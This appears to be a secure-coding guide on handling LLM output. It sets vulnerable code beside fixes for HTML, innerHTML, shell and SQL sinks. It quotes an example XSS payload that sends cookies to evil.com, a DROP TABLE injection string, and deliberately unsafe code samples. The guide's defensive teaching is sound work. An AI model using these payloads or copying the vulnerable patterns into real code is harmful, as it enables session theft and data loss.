
Output Handling

Output handling vulnerabilities occur when LLM responses are used in dangerous contexts without proper validation or encoding.

Output Validation Failures (HIGH)

CVSS 8.0 | CWE-79, CWE-89, CWE-94 | OWASP LLM02

LLM output used in dangerous sinks (eval, HTML, SQL, commands) without validation.

Vulnerable
LLM output rendered as HTML without encoding
from flask import Flask, request, render_template_string

app = Flask(__name__)

@app.route("/chat")
def chat():
    user_query = request.args.get("q", "")
    response = llm.invoke(user_query)

    # DANGEROUS: LLM output interpolated directly into the HTML template
    return render_template_string(f"""
        <div class="response">{response}</div>
    """)

# LLM could output: <script>document.location='evil.com?c='+document.cookie</script>
Secure
HTML escaped before rendering
from flask import Flask, request, render_template_string
from markupsafe import escape

app = Flask(__name__)

@app.route("/chat")
def chat():
    user_query = request.args.get("q", "")
    response = llm.invoke(user_query)

    # HTML-escape the response before it reaches the template
    safe_response = escape(response)

    return render_template_string(f"""
        <div class="response">{safe_response}</div>
    """)

Insufficient Output Encoding (MEDIUM)

XSS via unencoded LLM output in web applications.

Vulnerable
innerHTML with unescaped content
async function displayResponse(query) {
  const response = await fetch('/api/chat', {
    method: 'POST',
    body: JSON.stringify({ query })
  }).then(r => r.json());

  // DANGEROUS: innerHTML parses markup, so payloads like
  // <img src=x onerror=...> execute attacker-controlled script
  document.getElementById('output').innerHTML = response.message;
}
Secure
textContent prevents script execution
async function displayResponse(query) {
  const response = await fetch('/api/chat', {
    method: 'POST',
    body: JSON.stringify({ query })
  }).then(r => r.json());

  // Safe: textContent treats everything as text
  document.getElementById('output').textContent = response.message;

  // Or use a sanitization library if HTML rendering is required
  // import DOMPurify from 'dompurify';
  // element.innerHTML = DOMPurify.sanitize(response.message);
}

Output to Shell Commands

LLM output used in system commands without validation.

Vulnerable
LLM output passed to shell
import subprocess

def execute_llm_command(user_request):
    # LLM generates shell command
    command = llm.invoke(f"Generate bash command for: {user_request}")

    # CRITICAL: Direct shell execution
    result = subprocess.run(command, shell=True, capture_output=True)
    return result.stdout
Secure
Allowlist validation before execution
import subprocess
import shlex

ALLOWED_COMMANDS = {"ls", "pwd", "whoami", "date", "cat"}

def execute_llm_command(user_request):
    command = llm.invoke(f"Generate simple bash command for: {user_request}")

    # Parse the command
    parts = shlex.split(command)
    if not parts:
        raise ValueError("Empty command")

    # Allowlist check
    if parts[0] not in ALLOWED_COMMANDS:
        raise ValueError(f"Command not allowed: {parts[0]}")

    # Execute without shell
    result = subprocess.run(parts, shell=False, capture_output=True)
    return result.stdout
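The allowlist only constrains the binary; arguments still deserve validation before execution. A minimal sketch under the assumption that the only argument-taking command is cat (the ALLOWED_READ_DIR path and the helper name are illustrative, not part of the example above):

import os

ALLOWED_READ_DIR = "/srv/app/public"  # illustrative allowlisted directory

def validate_args(parts):
    # Resolve symlinks and ".." so every path argument must stay
    # inside the allowlisted directory before the command runs
    for arg in parts[1:]:
        real = os.path.realpath(arg)
        if not real.startswith(ALLOWED_READ_DIR + os.sep):
            raise ValueError(f"Argument not allowed: {arg}")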

Output to Database Queries

LLM-generated data used in database operations.

Vulnerable
LLM output in f-string SQL
def store_summary(document):
    summary = llm.invoke(f"Summarize: {document}")

    # DANGEROUS: LLM output in SQL string
    cursor.execute(f"INSERT INTO summaries (text) VALUES ('{summary}')")

# LLM could output: '); DROP TABLE summaries; --
Secure
Parameterized queries with validation
def store_summary(document):
    summary = llm.invoke(f"Summarize: {document}")

    # Parameterized query prevents injection
    cursor.execute(
        "INSERT INTO summaries (text) VALUES (%s)",
        (summary,)
    )
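The eval sink listed at the top of this page (CWE-94) follows the same rule: never execute model output as code. A minimal sketch of the safer pattern, assuming the model was prompted to return structured data rather than code (the function name is illustrative):

import json

def parse_llm_data(raw: str):
    # DANGEROUS alternative: eval(raw) would run whatever code the model emits
    # json.loads only parses data and can never execute code
    try:
        return json.loads(raw)
    except json.JSONDecodeError:
        raise ValueError("Model did not return valid JSON")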

Treat all LLM output as untrusted user input. Apply the same validation and encoding you would use for any external data.

Defense Strategies

1. Context-Aware Encoding

import html
import json
import shlex

def safe_output(content, context):
    if context == "html":
        return html.escape(content)
    elif context == "sql":
        # Use parameterized queries instead
        raise ValueError("Use parameterized queries for SQL")
    elif context == "shell":
        return shlex.quote(content)
    elif context == "json":
        return json.dumps(content)
    else:
        return content
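A usage sketch for the helper above (llm and document are assumed from the earlier examples):

summary = llm.invoke(f"Summarize: {document}")

# HTML context: encode before the text is placed in a page
html_fragment = f"<p>{safe_output(summary, 'html')}</p>"

# Shell context: quote before the text is placed on a command line
quoted_arg = safe_output(summary, "shell")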

2. Content Security Policy

<!-- Prevent inline script execution -->
<meta http-equiv="Content-Security-Policy"
      content="default-src 'self'; script-src 'self'">
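The same policy can also be sent as an HTTP response header; a minimal sketch for the Flask app used in the earlier examples:

@app.after_request
def set_csp(response):
    # Mirrors the meta tag: same-origin resources only, no inline scripts
    response.headers["Content-Security-Policy"] = (
        "default-src 'self'; script-src 'self'"
    )
    return response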

3. Output Validation Schema

from pydantic import BaseModel, validator

class SafeResponse(BaseModel):
    message: str
    confidence: float

    @validator('message')
    def no_html(cls, v):
        if '<' in v or '>' in v:
            raise ValueError('HTML not allowed in response')
        return v
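A usage sketch (pydantic v1 style, matching the validator decorator above; llm and user_query are assumed from the earlier examples, and the raw output is expected to be JSON matching the schema):

from pydantic import ValidationError

raw = llm.invoke(user_query)

try:
    reply = SafeResponse.parse_raw(raw)
except ValidationError:
    # Reject or re-prompt rather than passing unvalidated output downstream
    reply = SafeResponse(message="Sorry, I could not produce a safe reply.", confidence=0.0)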

Checklist

  • HTML escape all LLM output before rendering
  • Use textContent instead of innerHTML in JavaScript
  • Use parameterized queries for any database operations
  • Never pass LLM output directly to shell commands
  • Implement Content Security Policy headers
  • Validate output against expected schema